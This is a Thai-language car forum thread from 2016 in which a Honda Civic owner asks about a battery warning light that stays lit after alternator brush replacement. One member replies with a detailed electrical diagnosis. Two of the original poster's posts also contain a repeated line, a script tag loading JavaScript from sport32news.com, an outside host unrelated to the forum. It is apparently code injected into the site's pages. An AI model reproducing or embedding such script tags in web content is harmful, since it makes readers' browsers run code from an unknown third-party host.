ตอบ
CALM

เข้าร่วม: 19 สิงหา 2012
ตอบ: 318

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 286
ให้คำขอบคุณ: 568

ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 8 พฤษภาคม 2016 11:25 - อาการณ์ สัญลักษณ์ ไฟแบตค้าง หลังจากเปลี่ยนแปลงท่าน
-เรื่องมีอยู่ว่า. รถผม ตอนแรก ไฟแบตกระพริบ บ้างดับบ้าง เวลาวิ่งหรือเดินทางไกลครับ เป็นมาเกือบ 4 อาทิตย์ ได้ครับ มีวันนึงขับรถออกจากบ้าน ไฟแบต ค้าง แล้วรถก็ดับไป. และลองสตารท์เพื่อขับกลับบ้านก็ติดเลยขับกลับบ้าน หลังจากนั้น รุ่งขึ้น ผมก็เอารถไปเชค และได้เปลี่ยนแปลงท่าน ไดชาร์จไปครับ ที่ร้านแถวบ้าน แต่หลังจากเปลี่ยนมาแล้ว ขับกับจากร้านซ่อมถึงบ้าน ok. แต่พอ เช้าขับมาทำงานปกติ พอเริ่ม 50 กิโล ตลอดทาง เปิดเพลงฝัง มาตลอด และจู่ ๆ ไฟแบตก็เริ่มติด ค้างเลย ไม่กระพริบ ไม่ดับเลย แต่รถไม่ดับครับจน มาจอดที่ทำงานดับเครื่องและลองสตารท์ไหม่ แต่สัญลักษณ์ รูปแบตก็ติดค้างอยู่เหมือนเดิมครับ ไครพอจะรู้บ้างว่า เป็นที่อะไรครับ และพอจะแก้ไขยังไงดีครับผม พี่ ๆ ท่านไดรู้ หรือพอมีวิธีแก้และช่วยชี้แนะ บอกทีครับ.
รถ เกียร์ Auto
มีเครื่องเสียง 1 ชุด
มีกล่อง i-drive. ครับ
ขอบคุณ สำหรับคำตอบครับ ขอไห้รถพวกพี่ เพื่อน ๆ ทั้ง แรงและ หล่อ โดยปราศจากปัญหาได ๆ ทั้งสิ้นนะครับ ขอบคุณครับผม
ได้รับคำขอบคุณจาก: srithanon  jeang 
CALM

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 8 พฤษภาคม 2016 16:42 - อาการณ์ สัญลักษณ์ ไฟแบตค้าง หลังจากเปลี่ยนแปลงท่าน
แก้ คำว่า "แปลงท่าน เป็น แปลงถ่าน"ครับผม ขออภัย.... "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: jeang 
srithanon

เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
อาทิตย์, 8 พฤษภาคม 2016 17:09 - อาการณ์ สัญลักษณ์ ไฟแบตค้าง หลังจากเปลี่ยนแปลงท่าน
ในขณะที่ไฟแบ็ตติดอยู่นี้  หากใช้รถขับไปสักระยะหนึ่งเครื่องยนต์จะดับหรือไม่  สมมุติว่าว่าไฟไม่ดับยังติดเช่นเดิม  แม้จะใช้รถขับไปนานๆ   แสดงว่ามีความผิดปกติที่ตัว IC Regulator  ที่ทำหน้าที่ต่อลู๊ปกราวด์ไม่ทำงาน  ตัดระบบกราวด์ออก อันมาจากสาเหตุไม่มีไฟจากขั่วบวกของแบ็ต  มาที่สายไฟที่หัวเสียบคอนเน็คเตอร์ที่ตูดไดน์ชาร์จขาด หรือต่อไม่สนิท ( ไดน์ชาร์จที่มีสาย ขั่ว S, IG,และ L ในหัวปลั๊กเดียวกัน  และมีสาย +B แยกต่างหาก) โดยเฉพาะที่ขั่วสายตำแหน่ง S ขาดหรือต่อไม่สนิท  ทำให้ไม่มีไฟอีกส่วนหนึ่งป้อนกลับไปให้วงจร MIC ทำให้หลอดไฟชาร์จติดค้าง   สถานะไฟที่ตัวแบ็ตเตอรี่จะมีค่าโวลเต็จคงที่ประมาณ 13.3V ตลอด

ให้ทดลองเอามิเตอร์วัดไฟที่แบ็ตว่ามีก๊๋โวล  แล้วเร่งรอบเครื่องยนต์  หากโวลไม่เปลี่ยนแปลง  ยังอยู่ที่ 13.3V แสดงว่า สายไฟที่ต่อจากแบ็ตไปเข้าขั่ว S หลุดหลวมขาด  ให้ตรวจดูที่หัวคอนเน็คเตอร์ที่ตูดไดน์ชาร์จ  หรือดึงปลั๊กที่ตูดไดน์ชาร์จ ออกมาวัดไฟที่สายขั่ว S ว่ามีไฟที่ขัว S นี้หรือไม่  หากไม่มีสายก็ขาด  หรือตรงหัวคอนเน็คเตอร์ไฟผ่านไม่สะดวก  

ในกรณีที่สองให้วัดกระแสไฟจากขั่ว +B ที่ต่อไปยังขั่วบวกของแบ็ต  โดยใช้ DC clip amp meter หนีบคล่อมสายไฟเส้นนี้ แล้วสตาร์ทเครื่องยนต์  เร่งรอบไปมารอบสูงบ้างต่ำบ้าง  แล้วดูที่คลิปแอมมิเตอร์ มีกระแสไฟอ่านได้หรือไม่  หากไม่มีไดน์ชาร์จเสีย อาจจะมีขดลวดโรเตอร์ขาด  หรือเกิดช๊อร์ทเทินหรือลงกราวด์  เมื่อติดเครื่องยนต์ใช้งานรถ  พอตัวขดลวดโรเตอร์ร้อนและชอร์ท  ก็จะทำให้ไม่มีสนามแม่เหล็ก ตัดกับขดลวดสเตเตอร์  จึงไม่มีไฟและกระแสไฟออกมา หลอดไฟก็ติดค้าง

อากนนี้น่าสงสัยอยู่สองประเด็น ประเด็นแรกขดโรเตอร์ชอร์ทลงกราวด์หรือขาด  หากสตาร์ทเครื่องยนต์ในสภาวะเย็นแล้วไฟไม่ติด และเมื่อร้อนหลอดไฟติด  แสดงว่าขดโลเตอร์ชอร์ทเทินหรือชอร์ทลงกราวด์  แต่ถ้ามีไฟออกมาจากตัวไดน์ชาร์จที่ 13.3V คงที่  หลอดไฟติดค้าง ก็มากจากสายไฟจากแบ็ตมาที่ปลั๊กหัวคอนเน็ตเตอร์ขั่ว S ที่ตูดไดน์ชาร์จขาดหลวม  

ในกรณีที่ช่างได้แต่เปลี่ยนแปลงถ่าน โดยไม่ได้เช็คการชอร์ทเทินของขดลวดโรเตอร์ว่าช๊อร์ทกับกราวดหรือเปล่า  ก็จะทำให้อาการนี้กลับมาอีก  เพราะขดลวดโรเตอร์มันร้อนเกิดชอร์ทลงกราด์   ลองให้ช่างตรวจสอบตามที่กล่าวมาดูครับ.......srithanon
ได้รับคำขอบคุณจาก: CALM  noi_nongyai  jeang  peak 
CALM

อาทิตย์, 8 พฤษภาคม 2016 20:43 - อาการณ์ สัญลักษณ์ ไฟแบตค้าง หลังจากเปลี่ยนแปลงท่าน
ขอบคุณครับ พี่ สำหรับข้อมูลและรายละเอียดครับ ผม
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 10 พฤษภาคม 2016 09:11 - อาการณ์ สัญลักษณ์ ไฟแบตค้าง หลังจากเปลี่ยนแปลงท่าน

ขออภัย เข้ามาอ่านเพราะงง กับการใช้คำครับ
ในที่นี้ ต้องใช้คำว่า อาการ ครับ ไม่ใช่ อาการณ์
ได้รับคำขอบคุณจาก: CALM 
CALM

ศุกร์, 20 พฤษภาคม 2016 07:43 - อาการณ์ สัญลักษณ์ ไฟแบตค้าง หลังจากเปลี่ยนแปลงท่าน
Pantamitr พิมพ์ว่า:

ขออภัย เข้ามาอ่านเพราะงง กับการใช้คำครับ
ในที่นี้ ต้องใช้คำว่า อาการ ครับ ไม่ใช่ อาการณ์

ขอโทษครับผมที่ไช้ข้อความมิถูกต้อง ขอบคุณครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.